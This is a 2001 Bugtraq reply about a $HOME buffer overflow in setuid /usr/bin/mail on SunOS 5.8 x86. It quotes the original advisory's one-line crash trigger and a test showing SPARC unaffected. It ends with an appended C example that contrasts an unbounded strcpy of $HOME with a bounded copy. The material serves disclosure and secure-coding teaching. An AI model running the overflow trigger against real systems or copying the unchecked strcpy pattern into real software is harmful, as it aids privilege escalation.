Re: $HOME buffer overflow in SunOS 5.8 x86
Date: Tue, 5 Jun 2001 15:33:05 +0200
From: "Juergen P. Meier" <jpm@class.de>
To: Georgi Guninski <guninski@guninski.com>
Cc: Bugtraq <BUGTRAQ@securityfocus.com>
Message-ID: <20010605153305.A24252@fm.rz.fh-muenchen.de>
Reply-To: jpm@class.de
In-Reply-To: <3B1BA5D6.1C8D0055@guninski.com>; from guninski@guninski.com on Mon, Jun 04, 2001 at 06:14:30PM +0300
On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
> $HOME buffer overflow in SunOS 5.8 x86
> Systems affected:
> SunOS 5.8 x86; have not tested on other OSes
> Risk: Medium
> Date: 4 June 2001
>
> Details:
> HOME=`perl -e 'print "A"x1100'` ; export HOME
> mail a
> CTL-C
> eip gets smashed with 0x41414141.
0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
0:jpmeier@sol:/home/jpmeier> mail a
^Cmail: Mail saved in dead.letter
1:jpmeier@sol:/home/jpmeier> uname -a
SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10
Also tried larger buffers.
Solaris/sparc appears not vulnerable. Maybe it's an x86 bug only.
> Workaround:
> chmod -s /usr/bin/mail
> Vendor status:
> Sun was informed on 29 May 2001 about /usr/bin/mail and shall release patches.
juergen
--
Juergen P. Meier email: jpm@class.de
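The bug pattern behind the report, as an added example written for this page and not code from mail(1) or from either poster: an unbounded copy of $HOME into a fixed stack buffer, next to a bounded version that rejects oversize input instead of trusting the environment of a setuid program. The buffer size, the function names and the driver that builds the 1100-byte string are assumptions; the advisory does not show mail's source.

```c
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size; the advisory only says 1100 bytes overflows mail's. */
#define HOME_BUF 1024

/* The defect pattern behind the report: $HOME copied into a fixed-size
 * stack buffer with no length check. A value longer than the buffer runs
 * past its end and overwrites the saved return address, which is why the
 * report sees eip smashed with 0x41414141 ('A' is 0x41). */
void copy_home_unchecked(char *dst, const char *home)
{
    strcpy(dst, home);            /* unbounded copy: this is the bug */
}

/* Hardened form: measure first and refuse anything that does not fit,
 * instead of truncating silently or trusting the environment of a setuid
 * process. Returns 0 on success, -1 if home is missing or too long. */
int copy_home_checked(char *dst, size_t dstlen, const char *home)
{
    if (home == NULL || dstlen == 0)
        return -1;
    size_t n = strlen(home);
    if (n >= dstlen)              /* leave room for the terminating NUL */
        return -1;
    memcpy(dst, home, n + 1);
    return 0;
}

/* Constructed driver: builds a HOME value of len bytes of 'A' (the
 * advisory's perl -e 'print "A"x1100') and returns what the checked copy
 * says about it: 0 accepted, -1 rejected. */
int checked_copy_result(size_t len)
{
    char buf[HOME_BUF];
    char *home = malloc(len + 1);
    if (home == NULL)
        return -1;
    memset(home, 'A', len);
    home[len] = '\0';
    int rc = copy_home_checked(buf, sizeof buf, home);
    free(home);
    return rc;
}

/* Returns 1 if a normal path survives the checked copy unchanged. */
int checked_copy_preserves(const char *home)
{
    char buf[HOME_BUF];
    return copy_home_checked(buf, sizeof buf, home) == 0 && strcmp(buf, home) == 0;
}
```

The unchecked function is kept only for contrast and is never called with a long value here; the workaround in the advisory (chmod -s) removes the privilege boundary the overflow would cross, while the bounded copy removes the overflow itself.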